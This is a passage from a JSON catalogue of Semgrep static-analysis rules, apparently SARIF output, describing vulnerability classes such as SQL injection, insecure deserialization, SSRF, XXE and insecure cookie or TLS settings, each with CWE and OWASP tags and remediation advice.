consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.knex-express.knex-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.knex-express.knex-express","id":"javascript.express.db.knex-express.knex-express","name":"javascript.express.db.knex-express.knex-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.knex-express.knex-express"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"help":{"markdown":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor)\n - [https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption](https://stackoverflow.com/questions/1135186/whats-wrong-with-xor-encryption)\n","text":"Detected XOR cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use AES instead."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","id":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","name":"python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm.insecure-cipher-algorithm-xor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","id":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","name":"java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.deserialization.objectinputstream-deserialization.objectinputstream-deserialization"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"help":{"markdown":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected the use of exec(). exec() can be dangerous if used to evaluate dynamic content. If this content can be input from outside the program, this may be a code injection vulnerability. Ensure evaluated content is not definable by external sources."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.exec-detected.exec-detected","id":"python.lang.security.audit.exec-detected.exec-detected","name":"python.lang.security.audit.exec-detected.exec-detected","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.exec-detected.exec-detected"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"help":{"markdown":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings)\n - [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#security)\n - [https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration](https://www.playframework.com/documentation/2.8.x/SettingsSession#Session-Configuration)\n","text":"Session cookie `Secure` flag is explicitly disabled. The `secure` flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the `Secure` flag by setting `secure` to `true` in configuration file."},"helpUri":"https://semgrep.dev/r/scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","id":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","name":"scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: scala.play.security.conf-insecure-cookie-settings.conf-insecure-cookie-settings"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"help":{"markdown":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/db_instance#master_password)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/rds_cluster#master_password)\n - [https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password](https://registry.terraform.io/providers/hashicorp/random/latest/docs/resources/password)\n","text":"RDS instance or cluster with hardcoded credentials in source code. It is recommended to pass the credentials at runtime, or generate random credentials using the random_password resource."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","id":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","name":"terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.rds-insecure-password-storage-in-source-code.rds-insecure-password-storage-in-source-code"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"help":{"markdown":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2)\n - [https://jinja.palletsprojects.com/en/2.11.x/api/#basics](https://jinja.palletsprojects.com/en/2.11.x/api/#basics)\n","text":"Detected direct use of jinja2. If not done properly, this may bypass HTML escaping which opens up the application to cross-site scripting (XSS) vulnerabilities. Prefer using the Flask method 'render_template()' and templates with a '.html' extension in order to prevent XSS."},"helpUri":"https://semgrep.dev/r/python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","id":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","name":"python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"help":{"markdown":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ebs_volume#encrypted)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSEncryption.html)\n","text":"The AWS EBS volume is unencrypted. The volume, the disk I/O and any derived snapshots could be read if compromised. Volumes should be encrypted to ensure sensitive data is stored securely."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","id":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","name":"terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-unencrypted.aws-ebs-volume-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","id":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","name":"javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.superagent.hardcoded-bearer-token.hardcoded-bearer-token"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","id":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","name":"python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-with-http.request-session-with-http"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"help":{"markdown":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service)\n - [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#apiservice-v1-apiregistration-k8s-io)\n","text":"Service is disabling TLS certificate verification when communicating with the server. This makes your HTTPS connections insecure. Remove the 'insecureSkipTLSVerify: true' key to secure communication."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","id":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","name":"yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.skip-tls-verify-service.skip-tls-verify-service"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"help":{"markdown":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"The object is passed strictly to jose.JWT.sign(...) Make sure that sensitive information is not exposed through JWT token payload."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","id":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","name":"javascript.jose.security.audit.jose-exposed-data.jose-exposed-data","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.audit.jose-exposed-data.jose-exposed-data"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"help":{"markdown":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/kinesis_stream#encryption_type)\n - [https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html](https://docs.aws.amazon.com/streams/latest/dev/server-side-encryption.html)\n","text":"The AWS Kinesis stream does not encrypt data at rest. The data could be read if the Kinesis stream storage layer is compromised. Enable Kinesis stream server-side encryption."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","id":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","name":"terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-kinesis-stream-unencrypted.aws-kinesis-stream-unencrypted"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/](https://joblib.readthedocs.io/en/latest/generated/joblib.load.html/)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `joblib.load()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-joblib-django.tainted-joblib-django","id":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","name":"python.django.deserialization.tainted-joblib-django.tainted-joblib-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-joblib-django.tainted-joblib-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"help":{"markdown":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"A cookie was detected without setting the 'HttpOnly' flag. The 'HttpOnly' flag for cookies instructs the browser to forbid client-side scripts from reading the cookie. Set the 'HttpOnly' flag by calling 'cookie.setHttpOnly(true);'"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","id":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","name":"java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.cookie-missing-httponly.cookie-missing-httponly"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxreader-xxe-parameter-entities.saxreader-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - 